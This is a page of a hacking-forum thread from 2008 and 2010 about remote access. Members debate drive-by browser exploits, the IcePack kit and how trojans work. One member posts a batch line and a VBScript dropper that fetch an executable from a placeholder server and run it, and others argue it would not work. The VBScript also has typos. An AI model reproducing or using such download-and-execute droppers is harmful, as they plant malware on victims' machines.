Follow us on Twitter!
One mans freedom fighter, another's terrorist.
Friday, April 18, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 8
Guests Online: 8
Members Online: 0

Registered Members: 82822
Newest Member: TheBunter
Latest Articles
View Thread

HellBound Hackers | Computer General | Hacking in general

Page 2 of 3 < 1 2 3 >
Author

RE: telnet and remote access


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-11-08 17:23
There are. I used once something like that i think it was called icepack or something like that. I'll search after it and then I tell you.
It could be that it doesn't execute it but if it'S downloaded into the Autostart it doesn't matter.

Greetz
NoPax
Author

RE: telnet and remote access

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 05-11-08 20:08
Then can you explain why we don't get infected and backdoored a hundred times a day because we browse random sites?

I'm looking forward to your proof :happy:


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: telnet and remote access


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-11-08 20:20
So okay now I know why noone seemed to know icepack it's a exploit known only in the german hacker sceen. Perhaps you kann let translate this artikel with google.
http://blog.chip.de/0-security-blog/icepack-neues-malware-kit-im-angebot-20070728/

SO I can explain how, because you have to pay for this exploit it's not for free and the second reason is that most of the AV programms know it expect you buy the platin version. And it works only on windows.
Second reason: You have to modify it to your server, so the most script kiddies can't use it( this is perhaps not a good argument Grin )

Greetz
NoPax
Author

RE: telnet and remote access

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 05-11-08 20:27
It's a small exploit framework which contains exploits for the following vulnerabilities:

MS06-014 Internet Explorer 6 - MS06-006 Firefox 1.5
MS06-006 Opera 7
WVF Overflow
QuickTime Overflow
WinZip Overflow
VML Overflow

It's NOT a method for backdooring and running .exe files on all visitors of a page, just a bunch of outdated browser exploits and stuff (FF 1.5? IE6? Geez :angry: )


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: telnet and remote access


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-11-08 21:13
But if you went on it with the old server, it downloads a file and this could be a trojan. Or am I wrong ?

Greetz
NoPax
Author

RE: telnet and remote access

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 05-11-08 21:15
If that was possible (I must say if since I don't know for sure), that was only because of bugs/vulnerabilities in the browser and not a general exploit method.

Get the difference?


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: telnet and remote access


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-11-08 21:46
Actually, I was just thinking, VBScript. It has access to the file system and can execute other programs. So, even though it only works on IE on Windows, it is still an effective way of getting a trojan onto the person's computer and running it (since most people use IE and Windows). You'd have to find a place to actually be able to write to, but once you did that, whoever uses Windows and IE could be infected. The only trouble would be getting it to run fast enough so that the user won't know what it's doing. Might cause a problem when trying to send over an entire binary file. But I suppose you could make a batch script that could download a seperate binary file and then execute it. The batch script could look something like, uhm, maybe:

Code

echo "GET /file.exe HTTP/1.1\r\nHost: somehost\r\n\r\n" | telnet yourserver.com 80 > file.exe
start file.exe






Not sure though, haven't done batch scripting in a while.

Not sure about what the VBScript file would look like though, I'd have to read up on it.

Anyway, correct me if I'm wrong.
Author

RE: telnet and remote access

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 05-11-08 21:51
VBScript is protected against that, it can't create and execute a batch file on the website visitor's computer and finally using ECHO in batch would simply output the string in the console window - not download the target file.


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: telnet and remote access


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-11-08 22:14
Uberon I got the difference but i didn't mean it in generall. But you still can buy ice pack and it will work because they always update it.

And I thought you can create with VBS a file and write in it.
So why not create file.exe in Autostart
And copy the code of a download dropper in it ?

Greetz
NoPax
Author

RE: telnet and remote access

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 05-11-08 22:33
NoPax wrote:
Uberon I got the difference but i didn't mean it in generall. But you still can buy ice pack and it will work because they always update it.

I can't find any ice pack releases with FF3 support, in fact not even FF2... Where can I see these updated versions? :right:

And I thought you can create with VBS a file and write in it.
So why not create file.exe in Autostart
And copy the code of a download dropper in it ?

There's a big difference between running a VBS file from your own file system and using it on web pages. Try it B)


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: telnet and remote access


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-11-08 22:38
Hm I though they update because 1 year ago or longer when I looked it up there were sometimes some updates. COuld be that it changed since then.

Okay I will try it when i get my server =) But I thought you can add a script in your page to write a document. And than you could put in it

Code

set fso = createobject("Scripting.filesystemobject")
set s01 = Wscript.CreateObject("Wscript.shell")
set into=createobject("inetctls.inet")
into.requesttimeout=20
data=ineto.openurl("http://www.blob.com/blob.txt")
if not(data="") then
set downloaded=fsys.createtextfile("C:\NewUpdate.000")
downloaded.write data
downloaded.close
fso.copyfile "C:\NewUpdate.000" , "C:\server.exe"
s01.run "C:\server.exe"
end if




ANd on the server you put the exe file as an .txt file.
But I'm not sure if it works. That is a method how you can update vbs worms or virii but if it works with .exe i don't know.
But it was only an idea.

Greetz
NoPax
Author

RE: telnet and remote access

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 05-11-08 22:41
NoPax wrote:
Okay I will try it when i get my server =)

Do so, and don't forget to post your results Wink


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: telnet and remote access


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-11-08 22:43
Okay. But it seems that you know that it will not work =)

Greetz
NoPax
Author

RE: telnet and remote access

Uber0n
Member



Posts: 1963
Location: Sweden‭‮
Joined: 13.06.06
Rank:
Hacker Level 3
Posted on 05-11-08 22:47
NoPax wrote:
Okay. But it seems that you know that it will not work =)

Let's just say I'd be very surprised if it did, but don't let that stop you Wink

New exploits are only found by those who try things that theoretically shouldn't be possible.


img230.imageshack.us/img230/724/uber0nsig3hj6.gif
http://uber0n.web. . .
Nope http://uber0n.webs.com/
Author

RE: telnet and remote access


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 05-11-08 22:49
All right =)
I hope I find a exploit =)
That woud be my second found =)

Greetz
NoPax
Author

RE: I'm back to this one :)

TommyCat
Member

Your avatar

Posts: 35
Location:
Joined: 23.08.05
Rank:
Newbie
Posted on 27-10-10 02:58
Well, I have been absent from HBH for a pretty long time.. I can tell you that reading the first post on this thread makes me wonder how could I write that Smile

What I was trying to say back then was another thing, which I now understand. Read on, and you'll understand too. I didn't express myself very clearly, and I didn't have the knowledge. I had some time to study, so now I know how that can be achieved. :love:

I now write this for all of you who read this and are not yet on the right path.

First of all, some believe that ProRat's (free) client is malicious. The client downloads a malicious file named "Small.exe" to "c:\a" and then runs it. So if you are using ProRat, somebody else might be "trojaning" his/her way into your system.
If you want to check for yourself, just use a resource editor and go into SERVERFILE -> MINI_DOWNLOADER, and see for yourself.
Other *Free Remote Administration Tools* may or may not work in the same way. If you like to use trojans, make your own, and only test those that exist for "information and inspiration".

It's not that simple, but if you really want to "Become a Hacker" you must learn, among others, Computer Programming. A little advice: start with an easy-to-learn programming language, like Pascal, or Visual Basic. You can get Visual Studio Express for free from the Miccrosoft website.

And.. read. Read as much as you can. Read everything you can, and what's very important is that if you don't fully understand something, just ask someone.. be that person a teacher, a friend, or just a forum.

A good start are those "Learn C in 21 days" or "Learn Visual Basic in 21 days" or "Learn [something] in [whatever] days" tutorials you can find on the internet.
The decision on what programming language to start with is yours and only yours.. Read something about Visual Basic, Visual C, C, C++, C#, Python, PERL, LISP, WhiteSpace ( this one is kinda funny Grin ) and the list goes on and on. Just do a Google search for "Programming Languages" and read a little bit about each one, see some pictures, applications written in that programming language, test it a bit, and you will finally find one that suites you Smile

Python programmers are fairly rare these days compared to VB or C programmers. My opinion is that Python doesn't yet have a very friendly IDE (Integrated Development Environment ), but other than that, it is very powerful, and its syntax is very very clear. I have found some nice IDE's on the internet, especially one named "boa constructor" which allows easy development of GUI applications. Other than that there is also Aptana with Pydev.. also nice.. and the list goes on.

Turbo Pascal. This one is fairly old, and not very very powerful, but what i would like to say is that this one can really make a big difference. If you start with this one, you can really [ and I mean REALLY ] get to develop your logic thinking for programming.
Strucures from Pascal and syntax likewise Pascal's can be found in allmost every programming language that exists.
You learn basic logics, you learn about the screen's (display's) physical and logical structure, you learn basic data structures and so one. I can say that with Pascal you get to construct the basic logic that you need to advance in the art of computer programming.

Visual Studio(Basic, C, etc) has the big advantage of great *user friendlyness* I mean, so many features (like code completion, highlighting names of all instances of a specific variable in real time, easy integration of libraries, controls, etc in your application, etc etc etc) so this could be a good start too

I'm not going to debate here each and every programming language that I know, and I also don't expect you, the reader, to take into consideration only the features that i listed above for the IDE's and programming languages that I wrote about.
All IDE's and programming languages listed above have far more abilities and features. And what's also important is that there are many more programming languages and IDE's with many features around. You should choose the one that suites you best.

Back to trojans. Well, trojans are not so "high-tech", or in other words they don't require that the person that uses them has a very good understanding on how they work.
Most of them are basically the same thing, a server application that hides itself under a legitimate name, or hides completely. This server application accepts connections from a *client* application which can be found on the attacker's computer. Trough this, the attacker can execute code on the target machine (the one which has the server application running).
Trojans are mostly used for malicious purposes, such as uploading a keylogger on the target machine to get sensitive information about its user or users, or other malicious tasks.
Putting a trojan on a machine usually require (for uninitiated persons) social engineering, that is, convincing the victim to run it trough different methods such as communicating with the victim or hide the trojan inside a legitimate application for the victim to take it on his/her own from whatever place is it in (web site etc), or many other ways.


BUT. Once you read a little bit about *exploits* and what they are you will find yourself holding a "suc**er" sign, just like in the cartoons Smile.
Why? Because you will realize that ready-made trojans that reside on the internet under the name of "Remote Administration Tool" are nothing but dust in the wind compared to the real world of Hacking. Well, I believe that it is time to throw away that "suc**er" sign. Go ahead, take the red pill.
You'll see the beautiful art of programming and designing your own stuff, and so on. Just don't think that you're a hacker if you only use tools that others created and anyone that reads a forum post for 10 minutes can use.

Exploits.. you can call them programming flaws, doors that are close, without a handle/knob, but unlocked. You can find exploits all over the place.
You only have to find the right handle/knob for that door, or if the socket on the door looks like nobody has ever seen, but you think that you can forge a handle/knob that would fit this socket.. the go ahead and forge it. Then you can use it to open the door. Or maybe the door is locked, but you can find a key somewhere, or you can obtain an impregration of the key so that you can create the key. Or.. you have a wide variety of door handles and keys, and you really want/need to open a specific door.. go ahead, try the ones that you think would fit, or try the ones you want, or all of them.. this way.. you learn, you build up experience, you build up your skills.


What's very important and you should always remember: A Hacker is not the person that goes around opening doors and breaking stuff..
It's the one that also tests if a door is unlocked, or if someone could unlock it and steal something from inside, and then notifies the appropriate entity.
The person that learns more with everything he does, the person that tries to understand what he/she can't understand,
the person that can make others understand what they don't. The person that's wearing a white hat. Or a grey one if we are indulgent

Thank you for reading this and I hope you learned something.



It's the final CountDowN

Edited by TommyCat on 27-10-10 05:11
Author

RE: telnet and remote access

fuser
Member



Posts: 960
Location: in front of a computer (duh)
Joined: 05.04.07
Rank:
Mad User
Posted on 27-10-10 04:31
have you heard of this amazing thing called spacing between your words and making paragraphs?

because your post is very hard to read, it reminded me of the time when a drunk told me how the world is run by lizards or someshit.

edit it, and maybe I can comment on it better.




img.userbarz.com/51/10006.png
img.userbarz.com/146/29144.gif
img.userbarz.com/99/19602.jpg
img.userbarz.com/4/600.png
img.userbarz.com/45/8814.gif
img360.imageshack.us/img360/9231/bfbarlr0.jpg
[url=http://userbarz.com/][img]ht
catinthecpu@hotmail.com
Author

RE: telnet and remote access

TommyCat
Member

Your avatar

Posts: 35
Location:
Joined: 23.08.05
Rank:
Newbie
Posted on 27-10-10 05:16
fuser wrote:
have you heard of this amazing thing called spacing between your words and making paragraphs?

because your post is very hard to read, it reminded me of the time when a drunk told me how the world is run by lizards or someshit.

edit it, and maybe I can comment on it better.



It's done.
I don't think it was that hard to read, but i'm happy to make it better and easier to read. The whole point is that the readers understand what I have to say Smile
If it's still hard to read, just let me know and I'll try to make it better.


It's the final CountDowN
Author

RE: telnet and remote access

stealth-
Member



Posts: 1003
Location: Eh?
Joined: 10.04.09
Rank:
Mad User
Posted on 27-10-10 06:20
TommyCat wrote:
fuser wrote:
have you heard of this amazing thing called spacing between your words and making paragraphs?

because your post is very hard to read, it reminded me of the time when a drunk told me how the world is run by lizards or someshit.

edit it, and maybe I can comment on it better.



It's done.
I don't think it was that hard to read, but i'm happy to make it better and easier to read. The whole point is that the readers understand what I have to say Smile
If it's still hard to read, just let me know and I'll try to make it better.


Trust me, it's much better to read now than before.
Not that bad of content, either. However, I have to disagree with you on the number of Python programmers. There are *plenty*. It has nothing to do with the IDE, either. In fact, most programmers don't use IDE's anyways, especially with scripting languages. A lot of people see them as simply tools that do the work for you and unnecessarily abstract the actual coding process, causing new programmers to not really understand what they're doing. The one other point I disagree with was the "trojans are simple programs" part. When you start considering NAT, log systems, and avoiding detection the "simple program" easily becomes a very large and complex one.

Aside from that, it was an interesting read. Smile


The irony of man's condition is that the deepest need is to be free of the anxiety of death and annihilation; but it is life itself which awakens it, and so we must shrink from being fully alive.
http://www.stealt. . .
http://www.stealth-x.com
Author

RE: telnet and remote access

fuser
Member



Posts: 960
Location: in front of a computer (duh)
Joined: 05.04.07
Rank:
Mad User
Posted on 27-10-10 15:01
I agree with stealth there. In fact, I find it amusing about what you said on how unpopular python is.

Take a look at the codebank, for example: Python is the second most popular language in HBH, with 79 programming examples written for it, in contrast with VB.NET and C++.

However, I agree with your opinion that a person needs to learn proper programming techniques to develop a logical way of programming, although I think that some people would disagree with using Pascal, but each to their own, I guess. I mean, I could only grasp programming when I learned Java, (horrible I know) so each person to their own opinion, I guess.

Also, the ease of making a trojan depends on what you want it to do, and how do you want to do it. If lets say, you want to just view what the other person is doing, well, it's simple enough; but maybe you want to be able to read/write files on the disk and hide in the system processes, it's going to be a lot tougher.

Also, think out of the box; Adrian Lamo didn't even use any trojans, he just used a legal remote access tool. Why? Simple, would a security suite be alarmed when a legal application is connecting to the PC using a known port number, no, right? They'd just let it go through without blinking. That's another way of doing things.

But overall, I think your post is good.


img.userbarz.com/51/10006.png
img.userbarz.com/146/29144.gif
img.userbarz.com/99/19602.jpg
img.userbarz.com/4/600.png
img.userbarz.com/45/8814.gif
img360.imageshack.us/img360/9231/bfbarlr0.jpg
[url=http://userbarz.com/][img]ht
catinthecpu@hotmail.com
Page 2 of 3 < 1 2 3 >